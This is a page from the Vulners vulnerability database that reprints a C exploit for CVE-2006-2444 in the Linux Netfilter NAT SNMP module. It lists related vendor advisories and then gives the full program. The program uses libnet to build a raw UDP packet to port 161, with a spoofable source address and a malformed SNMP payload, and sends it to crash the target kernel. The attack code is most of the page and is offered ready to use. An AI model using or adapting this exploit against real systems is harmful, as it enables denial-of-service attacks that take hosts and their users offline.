Vulners
Lucene search
Linux Kernel < 2.6.16.18 (Netfilter NAT SNMP Module) Remote DoS Exploit
| Reporter | Title | Published | Views | Family All 52 |
|---|---|---|---|---|
 | Linux Kernel < 2.6.16.18 (Netfilter NAT SNMP Module) Remote DoS Exploit | 5 Jun 200600:00 | – | zdt |
 | Kerio MailServer < 6.1.3 Patch 1 Remote DoS | 9 Mar 200600:00 | – | nessus |
| CentOS 3 : kernel (CESA-2006:0437) | 4 Aug 200600:00 | – | nessus |
| CentOS 4 : kernel (CESA-2006:0617) | 30 Aug 200600:00 | – | nessus |
| Debian DSA-1183-1 : kernel-source-2.4.27 - several vulnerabilities | 14 Oct 200600:00 | – | nessus |
| Debian DSA-1184-2 : kernel-source-2.6.8 - several vulnerabilities | 14 Oct 200600:00 | – | nessus |
| Mandrake Linux Security Advisory : kernel (MDKSA-2006:087) | 27 May 200600:00 | – | nessus |
| Oracle Linux 4 : kernel (ELSA-2006-0617 / ELSA-2006-0689) | 12 Jul 201300:00 | – | nessus |
| RHEL 3 : kernel (RHSA-2006:0437) | 21 Jul 200600:00 | – | nessus |
| RHEL 4 : kernel (RHSA-2006:0617) | 23 Aug 200600:00 | – | nessus |
10
/*
* ecl-nf-snmpwn.c - 30/05/06
*
* Alex Behar <[email protected]>
* Yuri Gushin <[email protected]>
*
* A patch review we did on the 2.6.16.17->18 Linux kernel source tree revealed
* a restructuring of code in the snmp_parse_mangle() and the snmp_trap_decode()
* functions. After further research it turned out to be a vulnerability
* previously reported[1] and assigned with CVE-2006-2444. For more details,
* the version change log.
*
*
*
* 1) http://kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.16.18
*
* --
* Greets fly out to the ECL crew - Valentin Slavov, Dimityr Manevski.
* To stranger, shrink, the Console Pimps crew (blexim, ex0, hugin, w00f, matt,
* kyu, kbd and the rest), our favorite soldier boy Sagi Horev, the SigMIL crew,
* izik, tanin00, and everyone else we left out.
*
* P.S. - blexim, how are your FACECRABS ???? :))))
*
*/
#ifndef _BSD_SOURCE
#define _BSD_SOURCE
#endif
#include <stdio.h>
#include <string.h>
#include <time.h>
#include <libnet.h>
void banner();
void usage(char *);
char pwnage[] = "\x30\x0a\x02\x01\x00\x04\x03\x45\x43\x4c\xa4\x00";
int main(int argc, char **argv)
{
char errbuf[LIBNET_ERRBUF_SIZE];
libnet_t *l;
int c;
u_char *buf;
int packet_len = 0;
struct ip *IP;
struct udphdr *UDP;
u_int32_t src = 0, dst = 0;
banner();
if (argc < 3) usage(argv[0]);
if ((l = libnet_init(LIBNET_RAW4, NULL, errbuf)) == NULL) {
fprintf(stderr, "[!] libnet_init() failed: %s", errbuf);
exit(-1);
}
if ((src = libnet_name2addr4(l, argv[1], LIBNET_RESOLVE)) == -1) {
fprintf(stderr, "[!] Unresolved source address.\n");
exit(-1);
}
if ((dst = libnet_name2addr4(l, argv[2], LIBNET_RESOLVE)) == -1) {
fprintf(stderr, "[!] Unresolved destination address.\n");
exit(-1);
}
if ((buf = malloc(IP_MAXPACKET)) == NULL) {
perror("malloc");
exit(-1);
}
UDP = (struct udphdr *)(buf + LIBNET_IPV4_H);
packet_len = LIBNET_IPV4_H + LIBNET_UDP_H + sizeof(pwnage) - 1;
srand(time(NULL));
IP = (struct ip *) buf;
IP->ip_v = 4; /* version 4 */
IP->ip_hl = 5; /* header length */
IP->ip_tos = 0; /* IP tos */
IP->ip_len = htons(packet_len); /* total length */
IP->ip_id = rand(); /* IP ID */
IP->ip_off = htons(0); /* fragmentation flags */
IP->ip_ttl = 64; /* time to live */
IP->ip_p = IPPROTO_UDP; /* transport protocol */
IP->ip_sum = 0;
IP->ip_src.s_addr = src;
IP->ip_dst.s_addr = dst;
UDP->uh_sport = rand();
UDP->uh_dport = (argc > 3) ? htons((u_short)atoi(argv[3])) : htons(161);
UDP->uh_ulen = htons(LIBNET_UDP_H + sizeof(pwnage) - 1);
UDP->uh_sum = 0;
memcpy(buf + LIBNET_IPV4_H + LIBNET_UDP_H, pwnage, sizeof(pwnage) - 1);
libnet_do_checksum(l, (u_int8_t *)buf, IPPROTO_UDP, packet_len - LIBNET_IPV4_H);
if ((c = libnet_write_raw_ipv4(l, buf, packet_len)) == -1)
{
fprintf(stderr, "[!] Write error: %s\n", libnet_geterror(l));
exit(-1);
}
printf("[+] Packet sent.\n");
libnet_destroy(l);
free(buf);
return (0);
}
void usage(char *cmd)
{
printf("[!] Usage: %s <source> <destination> [port]\n", cmd);
exit(-1);
}
void banner()
{
printf("\t\tNetfilter NAT SNMP module DoS exploit\n"
"\t\t Yuri Gushin <[email protected]>\n"
"\t\t Alex Behar <[email protected]>\n"
"\t\t\t ECL Team\n\n\n");
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Dec 2007 00:00Current
0.5Low risk
Vulners AI Score0.5
EPSS0.69801